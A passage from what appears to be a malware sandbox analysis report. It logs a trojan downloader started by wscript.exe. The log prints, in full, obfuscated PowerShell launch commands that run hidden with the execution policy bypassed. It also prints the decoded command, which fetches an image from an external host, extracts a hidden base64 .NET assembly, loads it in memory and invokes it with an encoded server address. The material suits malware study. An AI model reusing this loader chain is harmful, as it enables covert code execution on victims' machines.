çNgBÇlkoç0BÇlkoçFMBÇlkoçdBÇlkoçByBÇlkoçGkBÇlkoçbgBnBÇlkoçCgBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZQBkBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçUgBlBÇlkoçGYBÇlkoçbBÇlkoçBlBÇlkoçGMBÇlkoçdBÇlkoçBpBÇlkoçG8BÇlkoçbgBÇlkoçuBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBdBÇlkoçDoBÇlkoçOgBMBÇlkoçG8BÇlkoçYQBkBÇlkoçCgBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçB0BÇlkoçHkBÇlkoçcBÇlkoçBlBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçbBÇlkoçBvBÇlkoçGEBÇlkoçZBÇlkoçBlBÇlkoçGQBÇlkoçQQBzBÇlkoçHMBÇlkoçZQBtBÇlkoçGIBÇlkoçbBÇlkoçB5BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçVBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçoBÇlkoçCcBÇlkoçRgBpBÇlkoçGIBÇlkoçZQByBÇlkoçC4BÇlkoçSBÇlkoçBvBÇlkoçG0BÇlkoçZQBÇlkoçnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçG0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçdBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçuBÇlkoçEcBÇlkoçZQB0BÇlkoçE0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCgBÇlkoçJwBWBÇlkoçEEBÇlkoçSQBÇlkoçnBÇlkoçCkBÇlkoçLgBJBÇlkoçG4BÇlkoçdgBvBÇlkoçGsBÇlkoçZQBÇlkoçoBÇlkoçCQBÇlkoçbgB1BÇlkoçGwBÇlkoçbBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçWwBvBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBbBÇlkoçF0BÇlkoçXQBÇlkoçgBÇlkoçCgBÇlkoçJwBkBÇlkoçEgBÇlkoçaBÇlkoçBÇlkoçwBÇlkoçEwBÇlkoçbQBÇlkoçxBÇlkoçGkBÇlkoçYgB5BÇlkoçDgBÇlkoçeBÇlkoçBOBÇlkoçFMBÇlkoçNBÇlkoçB6BÇlkoçE0BÇlkoçeQBÇlkoç0BÇlkoçHkBÇlkoçTgBDBÇlkoçDQBÇlkoçegBPBÇlkoçFQBÇlkoçRQB2BÇlkoçEwBÇlkoçegBwBÇlkoçHcBÇlkoçZBÇlkoçBIBÇlkoçFIBÇlkoçbwBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçZBÇlkoçBmBÇlkoçGQBÇlkoçZgBkBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGEBÇlkoçZBÇlkoçBzBÇlkoçGEBÇlkoçJwBÇlkoçgBÇlkoçCwBÇlkoçIBÇlkoçBÇlkoçnBÇlkoçGQBÇlkoçZQBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçYwB1BÇlkoçCcBÇlkoçKQBÇlkoçpBÇlkoçBÇlkoç==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('BÇlkoç','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002fc
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -command "$Codigo = 'JBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVQByBÇlkoçGwBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBoBÇlkoçHQBÇlkoçdBÇlkoçBwBÇlkoçHMBÇlkoçOgBÇlkoçvBÇlkoçC8BÇlkoçdQBwBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZBÇlkoçBlBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBuBÇlkoçHMBÇlkoçLgBjBÇlkoçG8BÇlkoçbQBÇlkoçuBÇlkoçGIBÇlkoçcgBÇlkoçvBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBzBÇlkoçC8BÇlkoçMBÇlkoçBÇlkoçwBÇlkoçDQBÇlkoçLwBÇlkoç2BÇlkoçDQBÇlkoçNBÇlkoçBÇlkoçvBÇlkoçDcBÇlkoçNBÇlkoçBÇlkoç5BÇlkoçC8BÇlkoçbwByBÇlkoçGkBÇlkoçZwBpBÇlkoçG4BÇlkoçYQBsBÇlkoçC8BÇlkoçbgBlBÇlkoçHcBÇlkoçXwBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçLgBqBÇlkoçHBÇlkoçBÇlkoçZwBÇlkoç/BÇlkoçDEBÇlkoçNgBÇlkoç5BÇlkoçDgBÇlkoçMBÇlkoçBÇlkoç4BÇlkoçDQBÇlkoçNQBÇlkoçyBÇlkoçDMBÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçdwBlBÇlkoçGIBÇlkoçQwBsBÇlkoçGkBÇlkoçZQBuBÇlkoçHQBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçTgBlBÇlkoçHcBÇlkoçLQBPBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçTgBlBÇlkoçHQBÇlkoçLgBXBÇlkoçGUBÇlkoçYgBDBÇlkoçGwBÇlkoçaQBlBÇlkoçG4BÇlkoçdBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçHcBÇlkoçZQBiBÇlkoçEMBÇlkoçbBÇlkoçBpBÇlkoçGUBÇlkoçbgB0BÇlkoçC4BÇlkoçRBÇlkoçBvBÇlkoçHcBÇlkoçbgBsBÇlkoçG8BÇlkoçYQBkBÇlkoçEQBÇlkoçYQB0BÇlkoçGEBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBVBÇlkoçHIBÇlkoçbBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçuBÇlkoçEUBÇlkoçbgBjBÇlkoçG8BÇlkoçZBÇlkoçBpBÇlkoçG4BÇlkoçZwBdBÇlkoçDoBÇlkoçOgBVBÇlkoçFQBÇlkoçRgBÇlkoç4BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçUwB0BÇlkoçHIBÇlkoçaQBuBÇlkoçGcBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBCBÇlkoçHkBÇlkoçdBÇlkoçBlBÇlkoçHMBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBTBÇlkoçFQBÇlkoçQQBSBÇlkoçFQBÇlkoçPgBÇlkoç+BÇlkoçCcBÇlkoçOwBÇlkoçkBÇlkoçGUBÇlkoçbgBkBÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBFBÇlkoçE4BÇlkoçRBÇlkoçBÇlkoç+BÇlkoçD4BÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBUBÇlkoçGUBÇlkoçeBÇlkoçB0BÇlkoçC4BÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçE8BÇlkoçZgBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçZQBuBÇlkoçGQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçTwBmBÇlkoçCgBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBGBÇlkoçGwBÇlkoçYQBnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçHMBÇlkoçdBÇlkoçBhBÇlkoçHIBÇlkoçdBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçZQBÇlkoçgBÇlkoçDBÇlkoçBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçCsBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçLgBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçYgBhBÇlkoçHMBÇlkoçZQBÇlkoç2BÇlkoçDQBÇlkoçTBÇlkoçBlBÇlkoçG4BÇlkoçZwB0BÇlkoçGgBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBzBÇlkoçHQBÇlkoçYQByBÇlkoçHQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçDsBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBTBÇlkoçHUBÇlkoçYgBzBÇlkoçHQBÇlkoçcgBpBÇlkoçG4BÇlkoçZwBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçQwBvBÇlkoçG4BÇlkoçdgBlBÇlkoçHIBÇlkoçdBÇlkoçBdBÇlkoçDoBÇlkoçOgBGBÇlkoçHIBÇlkoçbwBtBÇlkoçEIBÇlkoçYQBzBÇlkoçGUBÇlkoçNgBÇlkoç0BÇlkoçFMBÇlkoçdBÇlkoçByBÇlkoçGkBÇlkoçbgBnBÇlkoçCgBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZQBkBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçUgBlBÇlkoçGYBÇlkoçbBÇlkoçBlBÇlkoçGMBÇlkoçdBÇlkoçBpBÇlkoçG8BÇlkoçbgBÇlkoçuBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBdBÇlkoçDoBÇlkoçOgBMBÇlkoçG8BÇlkoçYQBkBÇlkoçCgBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçB0BÇlkoçHkBÇlkoçcBÇlkoçBlBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçbBÇlkoçBvBÇlkoçGEBÇlkoçZBÇlkoçBlBÇlkoçGQBÇlkoçQQBzBÇlkoçHMBÇlkoçZQBtBÇlkoçGIBÇlkoçbBÇlkoçB5BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçVBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçoBÇlkoçCcBÇlkoçRgBpBÇlkoçGIBÇlkoçZQByBÇlkoçC4BÇlkoçSBÇlkoçBvBÇlkoçG0BÇlkoçZQBÇlkoçnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçG0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçdBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçuBÇlkoçEcBÇlkoçZQB0BÇlkoçE0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCgBÇlkoçJwBWBÇlkoçEEBÇlkoçSQBÇlkoçnBÇlkoçCkBÇlkoçLgBJBÇlkoçG4BÇlkoçdgBvBÇlkoçGsBÇlkoçZQBÇlkoçoBÇlkoçCQBÇlkoçbgB1BÇlkoçGwBÇlkoçbBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçWwBvBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBbBÇlkoçF0BÇlkoçXQBÇlkoçgBÇlkoçCgBÇlkoçJwBkBÇlkoçEgBÇlkoçaBÇlkoçBÇlkoçwBÇlkoçEwBÇlkoçbQBÇlkoçxBÇlkoçGkBÇlkoçYgB5BÇlkoçDgBÇlkoçeBÇlkoçBOBÇlkoçFMBÇlkoçNBÇlkoçB6BÇlkoçE0BÇlkoçeQBÇlkoç0BÇlkoçHkBÇlkoçTgBDBÇlkoçDQBÇlkoçegBPBÇlkoçFQBÇlkoçRQB2BÇlkoçEwBÇlkoçegBwBÇlkoçHcBÇlkoçZBÇlkoçBIBÇlkoçFIBÇlkoçbwBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçZBÇlkoçBmBÇlkoçGQBÇlkoçZgBkBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGEBÇlkoçZBÇlkoçBzBÇlkoçGEBÇlkoçJwBÇlkoçgBÇlkoçCwBÇlkoçIBÇlkoçBÇlkoçnBÇlkoçGQBÇlkoçZQBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçYwB1BÇlkoçCcBÇlkoçKQBÇlkoçpBÇlkoçBÇlkoç==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('BÇlkoç','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath: powershell
1 1 0

CreateProcessInternalW

 thread_identifier: 2284
thread_handle: 0x00000450
process_identifier: 2280
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lm1iby8xNS4zMy4yNC4zOTEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000454
1 1 0
DrWeb Trojan.DownLoader46.26678
Kaspersky HEUR:Trojan.Script.Generic
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received We;çÌæ$m´œJÆÂçFה÷^òt† DOWNGRD ŒhÃs_ÏÏ¢žá“cIVԇòµ÷ZáÌƆ—¿¡äÀ ÿ 
Data received Q
Data received ‘
Data received Aº¦û:d­½VÕ1òóàä'õ¬èªYª„×?ÒÆEnF²-‹zvq\¢‘6»ï™ %šBœ¥&Œ'œA¼F0D 2 ØJFÏ|[ýŠ7À|äé?ô>Ÿ´Üý*¦ðI S&+©™O”>½¥˜tK0g£ê”ZäW½SüºšŽû¼
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received Fâý”ÃÏñó§q(ú&…í-pfò€ËÚɚ‘)ÜС›6ðweª^­V
Data sent yue;åWSGø´":Uά¨Zl½ ɨâ½êŸI¿„/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
Data sent FBA.uÓ-T<DËZ[g›ú⤬[0•dß$¦ÜѤ,áï¾åú͛q‡‡+文w²ª'ˆ˜w9Twþ0„“,®¶;+‚[Mz˜ŸØ))ì.a‰ÅÃÌzgⱩâ/J(»‰4JæÍ&§T
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Time & API Arguments Status Return Repeated

send

 buffer: yue;åWSGø´":Uά¨Zl½ ɨâ½êŸI¿„/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
socket: 1440
sent: 126
1 126 0

send

 buffer: FBA.uÓ-T<DËZ[g›ú⤬[0•dß$¦ÜѤ,áï¾åú͛q‡‡+文w²ª'ˆ˜w9Twþ0„“,®¶;+‚[Mz˜ŸØ))ì.a‰ÅÃÌzgⱩâ/J(»‰4JæÍ&§T
socket: 1440
sent: 134
1 134 0

WSASend

 buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 2016
0 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVQByBÇlkoçGwBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBoBÇlkoçHQBÇlkoçdBÇlkoçBwBÇlkoçHMBÇlkoçOgBÇlkoçvBÇlkoçC8BÇlkoçdQBwBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZBÇlkoçBlBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBuBÇlkoçHMBÇlkoçLgBjBÇlkoçG8BÇlkoçbQBÇlkoçuBÇlkoçGIBÇlkoçcgBÇlkoçvBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBzBÇlkoçC8BÇlkoçMBÇlkoçBÇlkoçwBÇlkoçDQBÇlkoçLwBÇlkoç2BÇlkoçDQBÇlkoçNBÇlkoçBÇlkoçvBÇlkoçDcBÇlkoçNBÇlkoçBÇlkoç5BÇlkoçC8BÇlkoçbwByBÇlkoçGkBÇlkoçZwBpBÇlkoçG4BÇlkoçYQBsBÇlkoçC8BÇlkoçbgBlBÇlkoçHcBÇlkoçXwBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçLgBqBÇlkoçHBÇlkoçBÇlkoçZwBÇlkoç/BÇlkoçDEBÇlkoçNgBÇlkoç5BÇlkoçDgBÇlkoçMBÇlkoçBÇlkoç4BÇlkoçDQBÇlkoçNQBÇlkoçyBÇlkoçDMBÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçdwBlBÇlkoçGIBÇlkoçQwBsBÇlkoçGkBÇlkoçZQBuBÇlkoçHQBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçTgBlBÇlkoçHcBÇlkoçLQBPBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçTgBlBÇlkoçHQBÇlkoçLgBXBÇlkoçGUBÇlkoçYgBDBÇlkoçGwBÇlkoçaQBlBÇlkoçG4BÇlkoçdBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçHcBÇlkoçZQBiBÇlkoçEMBÇlkoçbBÇlkoçBpBÇlkoçGUBÇlkoçbgB0BÇlkoçC4BÇlkoçRBÇlkoçBvBÇlkoçHcBÇlkoçbgBsBÇlkoçG8BÇlkoçYQBkBÇlkoçEQBÇlkoçYQB0BÇlkoçGEBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBVBÇlkoçHIBÇlkoçbBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçuBÇlkoçEUBÇlkoçbgBjBÇlkoçG8BÇlkoçZBÇlkoçBpBÇlkoçG4BÇlkoçZwBdBÇlkoçDoBÇlkoçOgBVBÇlkoçFQBÇlkoçRgBÇlkoç4BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçUwB0BÇlkoçHIBÇlkoçaQBuBÇlkoçGcBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBCBÇlkoçHkBÇlkoçdBÇlkoçBlBÇlkoçHMBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBTBÇlkoçFQBÇlkoçQQBSBÇlkoçFQBÇlkoçPgBÇlkoç+BÇlkoçCcBÇlkoçOwBÇlkoçkBÇlkoçGUBÇlkoçbgBkBÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBFBÇlkoçE4BÇlkoçRBÇlkoçBÇlkoç+BÇlkoçD4BÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBUBÇlkoçGUBÇlkoçeBÇlkoçB0BÇlkoçC4BÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçE8BÇlkoçZgBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçZQBuBÇlkoçGQBÇlkoç